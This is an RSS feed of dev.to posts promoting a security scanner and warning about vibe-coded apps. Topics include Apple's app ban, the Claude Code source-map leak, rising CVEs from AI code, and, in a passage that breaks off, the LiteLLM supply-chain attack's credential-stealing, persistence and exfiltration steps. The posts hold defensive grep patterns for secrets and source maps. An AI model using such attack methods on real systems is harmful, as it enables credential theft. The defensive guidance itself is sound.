<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Not Elon</title>
    <description>The latest articles on DEV Community by Not Elon (@solobillions).</description>
    <link>https://dev.to/solobillions</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3839315%2F9628317d-e592-43bb-a3af-6e7900c3e28a.jpg</url>
      <title>DEV Community: Not Elon</title>
      <link>https://dev.to/solobillions</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/solobillions"/>
    <language>en</language>
    <item>
      <title>Apple Just Killed a $100M Vibe Coding App. Here's the Security Angle Nobody's Talking About.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Thu, 02 Apr 2026 04:35:18 +0000</pubDate>
      <link>https://dev.to/solobillions/apple-just-killed-a-100m-vibe-coding-app-heres-the-security-angle-nobodys-talking-about-4hmp</link>
      <guid>https://dev.to/solobillions/apple-just-killed-a-100m-vibe-coding-app-heres-the-security-angle-nobodys-talking-about-4hmp</guid>
      <description>&lt;p&gt;Last week, Apple removed "Anything" from the App Store. The startup had raised $11M at a $100M valuation. Gone overnight.&lt;/p&gt;

&lt;p&gt;Replit and Vibecode are also blocked from releasing updates.&lt;/p&gt;

&lt;p&gt;The tech press is calling it anticompetitive. X is full of takes about Apple killing innovation. The narrative is simple: Apple wants you to use Xcode with their AI tools, not third-party vibe coding apps.&lt;/p&gt;

&lt;p&gt;But here's what nobody's talking about: &lt;strong&gt;Apple cited Guideline 2.5.2&lt;/strong&gt;. And that's a security rule, not a competition rule.&lt;/p&gt;

&lt;h2&gt;What Guideline 2.5.2 Actually Says&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;"Apps should be self-contained in their bundles, and may not read or write data outside the designated container area, nor may they download, install, or execute code which introduces or changes features or functionality of the app."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Vibe coding apps, by definition, do exactly what this rule prohibits. They download code, execute it, and change app functionality on the fly. That's the entire product.&lt;/p&gt;

&lt;p&gt;This isn't arbitrary. The rule exists because dynamic code execution is a security nightmare.&lt;/p&gt;
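&lt;p&gt;The prohibited pattern, reduced to its skeleton (a toy sketch, not any real app's code; the local file stands in for a network fetch):&lt;/p&gt;

```shell
# What 2.5.2 forbids, in miniature: obtain code at runtime, then execute it
echo 'echo "new feature enabled"' > remote-code.sh   # stand-in for a network fetch
sh remote-code.sh
```

&lt;p&gt;Nothing in that second step ever went through App Review. That's the objection.&lt;/p&gt;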

&lt;h2&gt;The Security Data Nobody's Citing&lt;/h2&gt;

&lt;p&gt;While everyone debates whether Apple is being anticompetitive, here's what's happening in the vibe coding security space:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;35 new CVEs in March 2026&lt;/strong&gt; traced directly to AI-generated code vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;escape.tech&lt;/strong&gt; scanned 5,600 live vibe-coded apps and found hundreds with exposed API keys and secrets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UK's NCSC CEO&lt;/strong&gt; called for vibe coding safeguards at RSA Conference this week&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trend Micro&lt;/strong&gt; published their vibe coding risk analysis yesterday, calling it a "real and growing threat"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Harvard Gazette&lt;/strong&gt; ran a piece today noting that vibe coders "don't typically need to concern themselves" with reliability, safety, and security&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The problem is real. The question is whether banning apps is the right solution.&lt;/p&gt;

&lt;h2&gt;Why Vibe Coding Apps Are Uniquely Risky on iOS&lt;/h2&gt;

&lt;p&gt;Traditional iOS apps go through App Review. Apple scans them for malware, policy violations, and common security issues.&lt;/p&gt;

&lt;p&gt;Vibe coding apps bypass this by generating code on-device after approval. The app that passes review is not the app users actually run. Whatever Claude or Codex generates next week isn't subject to any review.&lt;/p&gt;

&lt;p&gt;This creates a few problems:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection attacks&lt;/strong&gt; can generate malicious code without user awareness&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply chain vulnerabilities&lt;/strong&gt; in the underlying LLMs propagate to every app built with them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No static analysis is possible&lt;/strong&gt; on code that doesn't exist until runtime&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposed secrets&lt;/strong&gt; are common because vibe coders often don't know to protect them&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;Apple's Real Mistake&lt;/h2&gt;

&lt;p&gt;Apple is right that there's a security problem. They're wrong about the solution.&lt;/p&gt;

&lt;p&gt;Banning apps doesn't fix the underlying vulnerability. It just pushes vibe coding to the web, where the same apps can run without any review at all.&lt;/p&gt;

&lt;p&gt;A better approach:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Sandbox the generated code&lt;/strong&gt; more aggressively&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Require on-device code review&lt;/strong&gt; before execution&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mandate secret scanning&lt;/strong&gt; before deployment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Create a certification program&lt;/strong&gt; for vibe coding platforms that meet security standards&lt;/li&gt;
&lt;/ul&gt;
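&lt;p&gt;The secret-scanning gate is the easiest of those to sketch. A toy version (two key patterns only; real scanners cover hundreds):&lt;/p&gt;

```shell
# scan_build: return nonzero when build output contains strings shaped like common API keys
scan_build() {
  if grep -rnE 'sk-[A-Za-z0-9]{20,}|AKIA[0-9A-Z]{16}' "$1"; then
    return 1
  fi
  return 0
}

# demo against a build directory with a planted AWS-style key
mkdir -p dist
echo 'const key = "AKIAABCDEFGHIJKLMNOP";' > dist/app.js
scan_build dist; echo "scan exit code: $?"
```

&lt;p&gt;Wire something like this into CI so a nonzero exit blocks the deploy.&lt;/p&gt;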

&lt;p&gt;Instead, Apple took the easy path: ban first, figure it out later.&lt;/p&gt;

&lt;h2&gt;What This Means for Vibe Coders&lt;/h2&gt;

&lt;p&gt;If you're building with Lovable, Bolt, Cursor, or any other AI coding tool:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Your iOS distribution options just narrowed&lt;/strong&gt;. Web apps and PWAs are still fine. Native iOS apps generated by vibe coding tools face an uncertain future.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Security scanning is now mandatory&lt;/strong&gt;. If you're shipping anything, you need to run a security scan. Tools like &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;, Aikido, or ChakraView can catch exposed secrets and common vulnerabilities.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The regulatory spotlight is coming&lt;/strong&gt;. If Apple is cracking down, expect the EU, UK, and others to start asking questions about AI-generated code quality.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The vibe coding gold rush isn't over. But the "ship fast, worry later" phase might be.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building something with AI coding tools? &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; is a free security scanner for vibe-coded apps. Paste your GitHub URL or deployed site, get a security grade in seconds.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow &lt;a href="https://x.com/solobillionsHQ" rel="noopener noreferrer"&gt;@solobillionsHQ&lt;/a&gt; for daily vibe coding security updates.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>startup</category>
    </item>
    <item>
      <title>Anthropic Just Leaked Claude Code's Source. Here's What It Means for Your Vibe-Coded App.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 23:04:23 +0000</pubDate>
      <link>https://dev.to/solobillions/anthropic-just-leaked-claude-codes-source-heres-what-it-means-for-your-vibe-coded-app-1alf</link>
      <guid>https://dev.to/solobillions/anthropic-just-leaked-claude-codes-source-heres-what-it-means-for-your-vibe-coded-app-1alf</guid>
      <description>&lt;p&gt;Georgia Tech researchers just dropped a stat that should scare every vibe coder: &lt;strong&gt;35 new CVEs in March 2026 were traced directly to AI-generated code.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;But today, Anthropic proved the point better than any research paper could.&lt;/p&gt;

&lt;h2&gt;What Happened&lt;/h2&gt;

&lt;p&gt;Anthropic accidentally shipped a 59.8 MB JavaScript source map file in version 2.1.88 of their Claude Code npm package. That single file exposed the entire codebase: &lt;strong&gt;512,000 lines of TypeScript&lt;/strong&gt;, internal architecture details, 44 hidden feature flags, 20 unshipped features, and the exact prompts used to control the AI agent.&lt;/p&gt;

&lt;p&gt;Within hours, the code was mirrored across GitHub, forked into open-source alternatives, and analyzed by thousands of developers. Anthropic confirmed it was "a release packaging issue caused by human error."&lt;/p&gt;

&lt;p&gt;Human error. A source map in production. The exact same mistake AI coding tools make in your app every day.&lt;/p&gt;
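&lt;p&gt;If you've never looked inside a source map: the &lt;code&gt;sourcesContent&lt;/code&gt; field carries the original source verbatim. A hand-made example (real bundler output has the same shape):&lt;/p&gt;

```shell
# Build a minimal .js.map and read back what it exposes
printf '%s' '{"version":3,"sources":["src/secret-logic.ts"],"sourcesContent":["const internal = 1; // full original source"]}' > app.js.map
python3 -c "import json; m = json.load(open('app.js.map')); print(m['sources']); print(m['sourcesContent'][0])"
```

&lt;p&gt;Ship one of these next to your bundle and anyone can reconstruct the original TypeScript. That is exactly what happened to Anthropic.&lt;/p&gt;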

&lt;h2&gt;Why This Matters More Than You Think&lt;/h2&gt;

&lt;p&gt;This isn't just an Anthropic story. It's a pattern.&lt;/p&gt;

&lt;p&gt;Anthropic is a $30B company with a $2.5B ARR product. They have security teams, code review processes, and CI/CD pipelines. And a source map still made it to production.&lt;/p&gt;

&lt;p&gt;Now think about what's shipping in the average vibe-coded app built with Lovable, Bolt, or Cursor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source maps in production builds&lt;/strong&gt; (the exact same error Anthropic made)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;.env&lt;/code&gt; files committed to public repos&lt;/strong&gt; (your database credentials, API keys)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Debug endpoints left active&lt;/strong&gt; (admin panels, test routes with no auth)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hardcoded secrets in client-side code&lt;/strong&gt; (visible to anyone who opens DevTools)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No &lt;code&gt;.gitignore&lt;/code&gt; for sensitive files&lt;/strong&gt; (lockfiles, build artifacts, config files with credentials)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't theoretical. We see them in real apps every day.&lt;/p&gt;
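&lt;p&gt;The second item is worth checking right now: a committed &lt;code&gt;.env&lt;/code&gt; stays in git history even after you delete the file. Throwaway-repo demo (assumes &lt;code&gt;git&lt;/code&gt; is installed):&lt;/p&gt;

```shell
tmp=$(mktemp -d); cd "$tmp"
git init -q .
git config user.email demo@example.com; git config user.name demo
echo 'DB_PASSWORD=hunter2' > .env
git add .env; git commit -qm 'initial commit'
# the check to run at your own repo root: any output here means rotate those credentials
git ls-files | grep -Fx '.env'
```

&lt;p&gt;Adding &lt;code&gt;.env&lt;/code&gt; to &lt;code&gt;.gitignore&lt;/code&gt; afterwards does not remove it from history; rotate the secrets instead.&lt;/p&gt;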

&lt;h2&gt;The Pattern: Three Major AI Toolchain Incidents This Month&lt;/h2&gt;

&lt;p&gt;March 2026 was brutal for AI security:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LiteLLM supply chain attack&lt;/strong&gt; (March 24): A backdoored package on PyPI got 47,000 downloads in 46 minutes. The same attacker also poisoned Telnyx (742K monthly downloads). Malware was hidden in a WAV file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;trivy-action poisoned&lt;/strong&gt; (March 14): A GitHub Action used for security scanning was itself compromised. The tool meant to protect you became the attack vector.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Claude Code source leak&lt;/strong&gt; (March 31): 512,000 lines of production code exposed via a source map in an npm package. The AI coding tool leaked its own source code.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The tools we use to build and secure AI-generated code are themselves becoming the attack surface.&lt;/p&gt;

&lt;h2&gt;What the Leaked Code Actually Revealed&lt;/h2&gt;

&lt;p&gt;For anyone building AI agents or using Claude Code, the leaked source exposed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;A profanity flagging system&lt;/strong&gt; that quietly records flagged content&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;44 hidden feature flags&lt;/strong&gt; controlling unreleased capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A three-layer memory architecture&lt;/strong&gt; (MEMORY.md index, topic files, grep-based transcript search)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verification agent prompts&lt;/strong&gt; that explicitly call out Claude's tendency to claim it verified something without actually running the check&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That last one is telling. Anthropic's own internal prompts say: "reading is not verification. run it." They know their model takes shortcuts. Your vibe-coded app is built by that same model.&lt;/p&gt;

&lt;h2&gt;What You Should Do Right Now&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Check your builds for source maps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find source map files in your build output&lt;/span&gt;
find ./dist &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s2"&gt;"*.map"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s2"&gt;"*.js.map"&lt;/span&gt;

&lt;span class="c"&gt;# Check if your bundler is generating source maps for production&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s2"&gt;"sourcemap|sourceMap|devtool"&lt;/span&gt; webpack.config.&lt;span class="k"&gt;*&lt;/span&gt; vite.config.&lt;span class="k"&gt;*&lt;/span&gt; next.config.&lt;span class="k"&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check for exposed secrets:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Search for hardcoded API keys and credentials&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"sk-|api_key|password|secret|token"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.ts"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.js"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.env"&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;

&lt;span class="c"&gt;# Make sure .env is in .gitignore&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; .gitignore | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nb"&gt;env&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check your npm packages:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# See what files are included in your package&lt;/span&gt;
npm pack &lt;span class="nt"&gt;--dry-run&lt;/span&gt;

&lt;span class="c"&gt;# Add min-release-age to block new packages for 7 days&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"min-release-age=7"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; ~/.npmrc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Or scan your whole app in 30 seconds:&lt;/strong&gt; &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; checks for source maps, exposed secrets, missing auth, and the other common vibe coding mistakes. Free. No signup.&lt;/p&gt;

&lt;h2&gt;The Lesson&lt;/h2&gt;

&lt;p&gt;Anthropic has 1,000+ employees, dedicated security teams, and enterprise compliance requirements. They still shipped a source map to production.&lt;/p&gt;

&lt;p&gt;You're one person with an AI coding tool. What's in YOUR production build right now?&lt;/p&gt;

&lt;p&gt;The gap between code generation speed and security review isn't closing. It's accelerating. 35 new CVEs from AI code in March. The tools themselves are becoming attack vectors. And the developers who need security most are the ones least likely to check.&lt;/p&gt;

&lt;p&gt;Don't be the next leak. Scan your code before someone else does.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://venturebeat.com/technology/claude-codes-source-code-appears-to-have-leaked-heres-what-we-know" rel="noopener noreferrer"&gt;VentureBeat&lt;/a&gt;, &lt;a href="https://arstechnica.com/ai/2026/03/entire-claude-code-cli-source-code-leaks-thanks-to-exposed-map-file/" rel="noopener noreferrer"&gt;Ars Technica&lt;/a&gt;, &lt;a href="https://fortune.com/2026/03/31/anthropic-source-code-claude-code-data-leak-second-security-lapse-days-after-accidentally-revealing-mythos/" rel="noopener noreferrer"&gt;Fortune&lt;/a&gt;, &lt;a href="https://www.infosecurity-magazine.com/news/ai-generated-code-vulnerabilities/" rel="noopener noreferrer"&gt;Infosecurity Magazine&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>35 New CVEs in March From AI-Generated Code: The Numbers Are Getting Worse</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 17:08:44 +0000</pubDate>
      <link>https://dev.to/solobillions/35-new-cves-in-march-from-ai-generated-code-the-numbers-are-getting-worse-1nm7</link>
      <guid>https://dev.to/solobillions/35-new-cves-in-march-from-ai-generated-code-the-numbers-are-getting-worse-1nm7</guid>
      <description>&lt;p&gt;Georgia Tech researchers just dropped a stat that should scare every vibe coder: &lt;strong&gt;35 new CVEs in March 2026 were traced directly to AI-generated code.&lt;/strong&gt; That's up from 6 in January and 15 in February.&lt;/p&gt;

&lt;p&gt;The trend line is vertical.&lt;/p&gt;

&lt;h2&gt;The Vibe Security Radar&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://vibe-radar-ten.vercel.app/" rel="noopener noreferrer"&gt;Vibe Security Radar&lt;/a&gt; is a research project from Georgia Tech's Systems Software &amp;amp; Security Lab. They track vulnerabilities specifically introduced by AI coding tools that made it into public advisories (CVE.org, NVD, GitHub Advisory Database, OSV, RustSec).&lt;/p&gt;

&lt;p&gt;Their method:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pull from public vulnerability databases&lt;/li&gt;
&lt;li&gt;Find the commit that fixed each vulnerability&lt;/li&gt;
&lt;li&gt;Trace backwards to find who introduced the bug&lt;/li&gt;
&lt;li&gt;If the commit has an AI tool's signature (co-author tag, bot email), flag it&lt;/li&gt;
&lt;li&gt;AI agents investigate the root cause using actual Git history&lt;/li&gt;
&lt;/ol&gt;
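&lt;p&gt;Step 4 hinges on commit metadata. A throwaway-repo demo of the kind of signature they key on (the trailer text here is illustrative):&lt;/p&gt;

```shell
tmp=$(mktemp -d); cd "$tmp"
git init -q .
git config user.email demo@example.com; git config user.name demo
echo 'app code' > app.py
git add app.py
git commit -q -m 'add endpoint' -m 'Co-authored-by: Claude'
# flag commits carrying an AI co-author trailer
git log --format='%H %(trailers:key=Co-authored-by,valueonly)' | grep -i claude
```

&lt;p&gt;Copilot's inline suggestions never produce a trailer like this, which is exactly why the confirmed count undercounts.&lt;/p&gt;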

&lt;p&gt;&lt;strong&gt;74 confirmed cases so far.&lt;/strong&gt; The real number is estimated at 5-10x higher (400-700 across open source) because tools like Copilot leave no metadata traces.&lt;/p&gt;

&lt;h2&gt;Which Tools Introduce the Most Vulnerabilities?&lt;/h2&gt;

&lt;p&gt;Claude Code shows up the most in the data, but the lead researcher Hanqing Zhao says that's mostly because Claude "always leaves a signature." Copilot's inline suggestions leave no trace.&lt;/p&gt;

&lt;p&gt;They track approximately &lt;strong&gt;50 AI-assisted coding tools&lt;/strong&gt;: Claude Code, GitHub Copilot, Cursor, Devin, Windsurf, Aider, Amazon Q, Google Jules, and more.&lt;/p&gt;

&lt;h2&gt;Why This Matters for Vibe Coders&lt;/h2&gt;

&lt;p&gt;Here's the context that makes this urgent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;NCSC Warning&lt;/strong&gt;: The UK's National Cyber Security Centre CEO called for vibe coding safeguards at RSA Conference this week&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;escape.tech Data&lt;/strong&gt;: 5,600 live vibe-coded apps scanned, hundreds of vulnerabilities and exposed secrets found&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply Chain Attacks&lt;/strong&gt;: LiteLLM's PyPI package was backdoored (47K downloads in 46 minutes). The same attacker poisoned trivy-action, a security scanner itself&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Only 18%&lt;/strong&gt; of organizations can fix security vulnerabilities at the pace AI generates them (InformationWeek)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The gap between code generation speed and security review capacity is widening every month.&lt;/p&gt;

&lt;h2&gt;The 4 Most Common AI Code Vulnerabilities&lt;/h2&gt;

&lt;p&gt;Based on our analysis of hundreds of vibe-coded apps at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Hardcoded secrets&lt;/strong&gt; in source code (API keys, database credentials in plaintext)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No input validation&lt;/strong&gt; before database queries (SQL injection, NoSQL injection)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Missing authentication&lt;/strong&gt; on API endpoints (anyone can call them)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No rate limiting&lt;/strong&gt; on auth endpoints (brute force attacks trivial)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;AI coding tools generate functional code. They rarely generate secure code. The difference kills you in production.&lt;/p&gt;

&lt;h2&gt;What You Can Do Right Now&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;For your dependencies:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight conf"&gt;&lt;code&gt;&lt;span class="c"&gt;# .npmrc - block new packages for 7 days
&lt;/span&gt;&lt;span class="n"&gt;min&lt;/span&gt;-&lt;span class="n"&gt;release&lt;/span&gt;-&lt;span class="n"&gt;age&lt;/span&gt;=&lt;span class="m"&gt;7&lt;/span&gt;

&lt;span class="c"&gt;# uv.toml - same for Python
&lt;/span&gt;&lt;span class="n"&gt;exclude&lt;/span&gt;-&lt;span class="n"&gt;newer&lt;/span&gt; = &lt;span class="s2"&gt;"7 days"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most malicious packages get caught within 24-72 hours. A 7-day buffer kills the majority of supply chain attacks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For your code:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pin exact versions with lockfiles and hashes&lt;/li&gt;
&lt;li&gt;Never hardcode secrets (use environment variables)&lt;/li&gt;
&lt;li&gt;Add input validation on every endpoint that touches a database&lt;/li&gt;
&lt;li&gt;Rate limit authentication endpoints&lt;/li&gt;
&lt;li&gt;Run a security scan before deploying&lt;/li&gt;
&lt;/ul&gt;
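&lt;p&gt;For the first item, &lt;code&gt;pip hash&lt;/code&gt; computes the digest you pin next to a requirement (demo on a stand-in file; you'd normally run it on the wheel you downloaded):&lt;/p&gt;

```shell
# pip hash prints the sha256 line to paste into requirements.txt
echo 'stand-in for a downloaded wheel' > pkg-1.0.0.tar.gz
python3 -m pip hash pkg-1.0.0.tar.gz
```

&lt;p&gt;Put the resulting &lt;code&gt;--hash=sha256:...&lt;/code&gt; next to the pinned version and install with &lt;code&gt;--require-hashes&lt;/code&gt; so a swapped artifact fails loudly.&lt;/p&gt;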

&lt;p&gt;&lt;strong&gt;Free scanner:&lt;/strong&gt; &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; checks for the common vibe coding mistakes. Paste your repo or URL, get results in seconds. No signup required.&lt;/p&gt;

&lt;h2&gt;The Trend Is Clear&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Month&lt;/th&gt;
&lt;th&gt;CVEs from AI Code&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Jan 2026&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb 2026&lt;/td&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mar 2026&lt;/td&gt;
&lt;td&gt;35&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That's a 150% month-over-month increase in February, then 133% in March. If this trajectory holds, April could see 70+.&lt;/p&gt;

&lt;p&gt;The tools that generate code are getting faster. The tools that secure it aren't keeping up. That gap is the vulnerability.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://www.infosecurity-magazine.com/news/ai-generated-code-vulnerabilities/" rel="noopener noreferrer"&gt;Infosecurity Magazine&lt;/a&gt;, &lt;a href="https://vibe-radar-ten.vercel.app/" rel="noopener noreferrer"&gt;Georgia Tech Vibe Security Radar&lt;/a&gt;, &lt;a href="https://www.ncsc.gov.uk/news/ncsc-ceo-seize-disruptive-vibe-coding-opportunity-to-make-software-more-secure" rel="noopener noreferrer"&gt;NCSC&lt;/a&gt;, &lt;a href="https://www.informationweek.com/machine-learning-ai/vibe-coding-speed-without-security-is-a-liability" rel="noopener noreferrer"&gt;InformationWeek&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
    </item>
    <item>
      <title>The LiteLLM Supply Chain Attack: Why Vibe Coders Are the Most Exposed</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Tue, 31 Mar 2026 00:32:54 +0000</pubDate>
      <link>https://dev.to/solobillions/the-litellm-supply-chain-attack-why-vibe-coders-are-the-most-exposed-342d</link>
      <guid>https://dev.to/solobillions/the-litellm-supply-chain-attack-why-vibe-coders-are-the-most-exposed-342d</guid>
      <description>&lt;p&gt;On March 24, 2026, someone slipped malicious code into LiteLLM versions 1.82.7 and 1.82.8 on PyPI. LiteLLM gets 95 million downloads per month. It's the library that lets you route requests across LLM providers through a single API.&lt;/p&gt;

&lt;p&gt;If you're vibe coding with any AI tool that uses LiteLLM under the hood, this affects you directly.&lt;/p&gt;

&lt;h2&gt;What Happened&lt;/h2&gt;

&lt;p&gt;The attacker (tracked as TeamPCP by Endor Labs) injected 12 lines of code into &lt;code&gt;proxy_server.py&lt;/code&gt;. The code executes the moment the module is imported. No user interaction needed.&lt;/p&gt;

&lt;p&gt;Version 1.82.8 went further: it added a &lt;code&gt;.pth&lt;/code&gt; file that runs the payload on &lt;strong&gt;any Python invocation&lt;/strong&gt;, even if you never import LiteLLM. Just having it installed is enough.&lt;/p&gt;

&lt;p&gt;The payload runs a three-stage attack:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Harvests credentials&lt;/strong&gt;: SSH keys, cloud tokens, Kubernetes secrets, crypto wallets, and &lt;code&gt;.env&lt;/code&gt; files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement&lt;/strong&gt;: Deploys privileged pods across Kubernetes clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistence&lt;/strong&gt;: Installs a systemd backdoor that polls for additional binaries&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Everything gets encrypted and exfiltrated to an attacker-controlled domain.&lt;/p&gt;

&lt;h2&gt;Why Vibe Coders Are Most Exposed&lt;/h2&gt;

&lt;p&gt;This is the part that matters if you're building with Cursor, Lovable, Bolt, or Replit.&lt;/p&gt;

